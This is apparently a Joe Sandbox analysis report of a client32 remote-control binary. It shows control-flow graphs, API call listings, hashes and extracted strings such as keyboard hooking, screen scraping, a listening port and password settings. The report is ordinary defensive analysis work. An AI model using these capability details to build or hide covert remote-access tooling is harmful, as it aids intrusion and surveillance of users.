2154->2174 2155->2150 2192 1102e7a3-1102e7bc call 11081d30 2157->2192 2178 1102e761-1102e784 2158->2178 2179 1102e786-1102e788 2158->2179 2160->2159 2186 1102e402-1102e404 call 1102d900 2173->2186 2174->2173 2174->2186 2178->2192 2189 1102e790-1102e7a1 2179->2189 2194 1102e613-1102e61f 2182->2194 2183->2194 2201 1102e5a5-1102e5ae 2183->2201 2186->2140 2189->2189 2189->2192 2211 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2192->2211 2212 1102e8fc-1102e909 _strncpy 2192->2212 2199 1102e662-1102e671 2194->2199 2200 1102e621-1102e62d 2194->2200 2199->2111 2204 1102e673-1102e674 FreeLibrary 2199->2204 2202 1102e63f-1102e643 2200->2202 2203 1102e62f-1102e63d GetProcAddress 2200->2203 2201->2194 2209 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2201->2209 2207 1102e654-1102e656 SetLastError 2202->2207 2208 1102e645-1102e648 2202->2208 2203->2202 2204->2111 2214 1102e65c 2207->2214 2208->2214 2209->2194 2230 1102e5e8-1102e60e call 11147060 call 11027f80 2209->2230 2243 1102e853-1102e869 call 11129e00 2211->2243 2244 1102e83f-1102e84e call 11029a70 2211->2244 2217 1102e90c-1102e911 CharUpperA 2212->2217 2214->2199 2217->2129 2230->2194 2248 1102e882-1102e8bc call 110d0e20 * 2 2243->2248 2249 1102e86b-1102e87d call 110d0e20 2243->2249 2244->2243 2256 1102e8d2-1102e8fa _strncpy call 110d0a10 2248->2256 2257 1102e8be-1102e8cd call 11029a70 2248->2257 2249->2248 2256->2217 2257->2256
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: $18/11/16 11:28:14 V12.10F20$878411$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                • API String ID: 1029625771-1787036592
                                                                                • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2261 11142010-11142051 call 11147060 2264 11142057-111420b3 LoadLibraryA 2261->2264 2265 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2261->2265 2266 111420b5-111420c0 call 11017a40 2264->2266 2267 111420c7-111420d0 2264->2267 2277 11142105-1114210b 2265->2277 2278 11142133 2265->2278 2266->2267 2274 111420c2 call 110ccc90 2266->2274 2267->2265 2270 111420d2-111420d3 FreeLibrary 2267->2270 2270->2265 2274->2267 2277->2278 2280 1114210d-11142113 2277->2280 2279 1114213d-1114215d GetClassInfoExA 2278->2279 2282 11142163-1114218a call 11162be0 call 11145080 2279->2282 2283 111421fe-11142256 2279->2283 2280->2278 2281 11142115-11142131 call 1105e820 2280->2281 2281->2279 2292 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2282->2292 2293 1114218c-111421a0 call 11029a70 2282->2293 2294 11142292-11142298 2283->2294 2295 11142258-1114225e 2283->2295 2292->2283 2316 111421e7-111421fb call 11029a70 2292->2316 2293->2292 2296 111422d4-111422f6 call 1105e820 2294->2296 2297 1114229a-111422a9 call 111101b0 2294->2297 2295->2294 2299 11142260-11142266 2295->2299 2313 11142304-11142309 2296->2313 2314 111422f8-11142302 2296->2314 2311 111422cd 2297->2311 2312 111422ab-111422cb 2297->2312 2299->2294 2304 11142268-1114227f call 1112d770 LoadLibraryA 2299->2304 2304->2294 2320 11142281-1114228d GetProcAddress 2304->2320 2317 111422cf 2311->2317 2312->2317 2318 11142315-1114231b 2313->2318 2319 1114230b 2313->2319 2314->2318 2316->2283 2317->2296 2322 1114231d-11142323 call 110f8230 2318->2322 2323 11142328-11142341 call 1113d9a0 2318->2323 2319->2318 2320->2294 2322->2323 2329 11142347-1114234d 2323->2329 2330 111423e9-111423fa 2323->2330 2331 1114234f-11142361 call 111101b0 2329->2331 2332 11142389-1114238f 2329->2332 2343 11142363-11142379 call 1115e590 2331->2343 2344 1114237b 2331->2344 2334 111423b5-111423c1 2332->2334 2335 11142391-11142397 2332->2335 2338 111423c3-111423c9 2334->2338 2339 111423d8-111423e3 #17 LoadLibraryA 2334->2339 2336 1114239e-111423b0 SetTimer 2335->2336 2337 11142399 call 11135840 2335->2337 2336->2334 2337->2336 2338->2339 2342 111423cb-111423d1 2338->2342 2339->2330 2342->2339 2345 111423d3 call 1112e5e0 2342->2345 2347 1114237d-11142384 2343->2347 2344->2347 2345->2339 2347->2332
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                                • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                • _memset.LIBCMT ref: 11142169
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                                • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                • RegisterClassExA.USER32(?), ref: 111421DA
                                                                                • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                                • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                                • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                  • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,1B702977,11030346,00000000), ref: 11017A6E
                                                                                  • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                  • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                  • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                  • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                  • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                • API String ID: 3706574701-3145203681
                                                                                • Opcode ID: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                                • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                • Opcode Fuzzy Hash: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                                • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2350 11028c10-11028c2d 2351 11028c33-11028c62 2350->2351 2352 110292f8-110292ff 2350->2352 2355 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 2351->2355 2356 11028c68-11028c6e 2351->2356 2353 11029311-11029315 2352->2353 2354 11029301-1102930a 2352->2354 2358 11029317-11029329 call 11162bb7 2353->2358 2359 1102932a-1102933e call 11162bb7 2353->2359 2354->2353 2357 1102930c 2354->2357 2371 11028d3d 2355->2371 2361 11028c70-11028c78 2356->2361 2357->2353 2361->2361 2365 11028c7a-11028c80 2361->2365 2366 11028c83-11028c88 2365->2366 2366->2366 2370 11028c8a-11028c94 2366->2370 2372 11028cb1-11028cb7 2370->2372 2373 11028c96-11028c9d 2370->2373 2374 11028d40-11028d4a 2371->2374 2378 11028cb8-11028cbe 2372->2378 2377 11028ca0-11028ca6 2373->2377 2375 11028d50-11028d53 2374->2375 2376 110292ef-110292f7 2374->2376 2375->2376 2379 11028d59-11028d67 call 11026ef0 2375->2379 2376->2352 2377->2377 2380 11028ca8-11028cae 2377->2380 2378->2378 2381 11028cc0-11028cee call 11164ead 2378->2381 2386 11029275-1102928a call 11164c77 2379->2386 2387 11028d6d-11028d80 call 11163ca7 2379->2387 2380->2372 2381->2374 2386->2376 2394 11029290-110292ea 2386->2394 2392 11028d82-11028d85 2387->2392 2393 11028d8b-11028db3 call 11026d60 call 11026ef0 2387->2393 2392->2386 2392->2393 2393->2386 2399 11028db9-11028dd6 call 11026fe0 call 11026ef0 2393->2399 2394->2376 2404 110291e5-110291ec 2399->2404 2405 11028ddc 2399->2405 2407 11029212-11029219 2404->2407 2408 110291ee-110291f1 2404->2408 2406 11028de0-11028e00 call 11026d60 2405->2406 2418 11028e02-11028e05 2406->2418 2419 11028e36-11028e39 2406->2419 2409 11029231-11029238 2407->2409 2410 1102921b-11029221 2407->2410 2408->2407 2412 110291f3-110291fa 2408->2412 2415 1102923a-11029245 2409->2415 2416 11029248-1102924f 2409->2416 2414 11029227-1102922f 2410->2414 2413 11029200-11029210 2412->2413 2413->2407 2413->2413 2414->2409 2414->2414 2415->2416 2420 11029251-1102925b 2416->2420 2421 1102925e-11029265 2416->2421 2422 11028e07-11028e0e 2418->2422 2423 11028e1e-11028e21 2418->2423 2425 110291ce-110291df call 11026ef0 2419->2425 2426 11028e3f-11028e52 call 11165010 2419->2426 2420->2421 2421->2386 2424 11029267-11029272 2421->2424 2427 11028e14-11028e1c 2422->2427 2423->2425 2428 11028e27-11028e31 2423->2428 2424->2386 2425->2404 2425->2406 2426->2425 2433 11028e58-11028e74 call 1116558e 2426->2433 2427->2423 2427->2427 2428->2425 2436 11028e76-11028e7c 2433->2436 2437 11028e8f-11028ea5 call 1116558e 2433->2437 2438 11028e80-11028e88 2436->2438 2442 11028ea7-11028ead 2437->2442 2443 11028ebf-11028ed5 call 1116558e 2437->2443 2438->2438 2440 11028e8a 2438->2440 2440->2425 2444 11028eb0-11028eb8 2442->2444 2448 11028ed7-11028edd 2443->2448 2449 11028eef-11028f05 call 1116558e 2443->2449 2444->2444 2446 11028eba 2444->2446 2446->2425 2451 11028ee0-11028ee8 2448->2451 2454 11028f07-11028f0d 2449->2454 2455 11028f1f-11028f35 call 1116558e 2449->2455 2451->2451 2452 11028eea 2451->2452 2452->2425 2456 11028f10-11028f18 2454->2456 2460 11028f37-11028f3d 2455->2460 2461 11028f4f-11028f65 call 1116558e 2455->2461 2456->2456 2458 11028f1a 2456->2458 2458->2425 2462 11028f40-11028f48 2460->2462 2466 11028f67-11028f6d 2461->2466 2467 11028f7f-11028f95 call 1116558e 2461->2467 2462->2462 2464 11028f4a 2462->2464 2464->2425 2468 11028f70-11028f78 2466->2468 2472 11028f97-11028f9d 2467->2472 2473 11028faf-11028fc5 call 1116558e 2467->2473 2468->2468 2470 11028f7a 2468->2470 2470->2425 2474 11028fa0-11028fa8 2472->2474 2478 11028fc7-11028fcd 2473->2478 2479 11028fdf-11028ff5 call 1116558e 2473->2479 2474->2474 2476 11028faa 2474->2476 2476->2425 2481 11028fd0-11028fd8 2478->2481 2484 11028ff7-11028ffd 2479->2484 2485 1102900f-11029025 call 1116558e 2479->2485 2481->2481 2483 11028fda 2481->2483 2483->2425 2486 11029000-11029008 2484->2486 2490 11029027-1102902d 2485->2490 2491 1102903f-11029055 call 1116558e 2485->2491 2486->2486 2488 1102900a 2486->2488 2488->2425 2492 11029030-11029038 2490->2492 2496 11029057-1102905d 2491->2496 2497 1102906f-11029085 call 1116558e 2491->2497 2492->2492 2494 1102903a 2492->2494 2494->2425 2499 11029060-11029068 2496->2499 2502 110290a6-110290bc call 1116558e 2497->2502 2503 11029087-1102908d 2497->2503 2499->2499 2500 1102906a 2499->2500 2500->2425 2508 110290d3-110290e9 call 1116558e 2502->2508 2509 110290be 2502->2509 2504 11029097-1102909f 2503->2504 2504->2504 2506 110290a1 2504->2506 2506->2425 2514 11029100-11029116 call 1116558e 2508->2514 2515 110290eb 2508->2515 2510 110290c4-110290cc 2509->2510 2510->2510 2512 110290ce 2510->2512 2512->2425 2520 11029137-1102914d call 1116558e 2514->2520 2521 11029118-1102911e 2514->2521 2516 110290f1-110290f9 2515->2516 2516->2516 2518 110290fb 2516->2518 2518->2425 2526 1102916f-11029185 call 1116558e 2520->2526 2527 1102914f-1102915f 2520->2527 2522 11029128-11029130 2521->2522 2522->2522 2524 11029132 2522->2524 2524->2425 2532 11029187-1102918d 2526->2532 2533 1102919c-110291b2 call 1116558e 2526->2533 2529 11029160-11029168 2527->2529 2529->2529 2531 1102916a 2529->2531 2531->2425 2534 11029190-11029198 2532->2534 2533->2425 2538 110291b4-110291ba 2533->2538 2534->2534 2536 1102919a 2534->2536 2536->2425 2539 110291c4-110291cc 2538->2539 2539->2425 2539->2539
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74351370,?,0000001A), ref: 11028CFD
                                                                                • _strrchr.LIBCMT ref: 11028D0C
                                                                                  • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileModuleName__stricmp_l_strrchr
                                                                                • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                • API String ID: 1609618855-357498123
                                                                                • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52

                                                                                Control-flow Graph
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                                • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                • InterlockedExchange.KERNEL32(012F8D80,00001388), ref: 110313BA
                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                Similarity
                                                                                • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                                • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                                • API String ID: 1620732580-3468083601
                                                                                • Opcode ID: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                                • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                                • Opcode Fuzzy Hash: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                                • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51

                                                                                Control-flow Graph
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                                • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                                • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                                • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                • API String ID: 2201880244-3035937465
                                                                                • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                                • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                                APIs
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 3535843008-1834795898
                                                                                • Opcode ID: 9d3d061c5af9482e31b63a56b579fcc6e38a324d7f7f34a6741c6d34e12f4a18
                                                                                • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                                • Opcode Fuzzy Hash: 9d3d061c5af9482e31b63a56b579fcc6e38a324d7f7f34a6741c6d34e12f4a18
                                                                                • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                                • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                                • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                                • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                                • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                                • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                                • _strncpy.LIBCMT ref: 11074E38
                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                                • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
                                                                                • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                                • std::exception::exception.LIBCMT ref: 11075038
                                                                                • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                                Similarity
                                                                                • API ID: CritiusernitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                • API String ID: 703120326-1497550179
                                                                                • Opcode ID: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                                • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                                • Opcode Fuzzy Hash: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                                • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65

                                                                                Control-flow Graph
                                                                                APIs
                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • PostMessageA.USER32(00040310,000006CF,00000007,00000000), ref: 11139C4F
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SetWindowTextA.USER32(00040310,00000000), ref: 11139CF7
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139DBC
                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139DEA
                                                                                • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                                • EnableWindow.USER32(00040310,00000001), ref: 11139E27
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139E78
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139E85
                                                                                • EnableWindow.USER32(00040310,00000000), ref: 11139E99
                                                                                • EnableWindow.USER32(00040310,00000000), ref: 11139DFF
                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(00040310,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                • EnableWindow.USER32(00040310,00000001), ref: 11139EAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
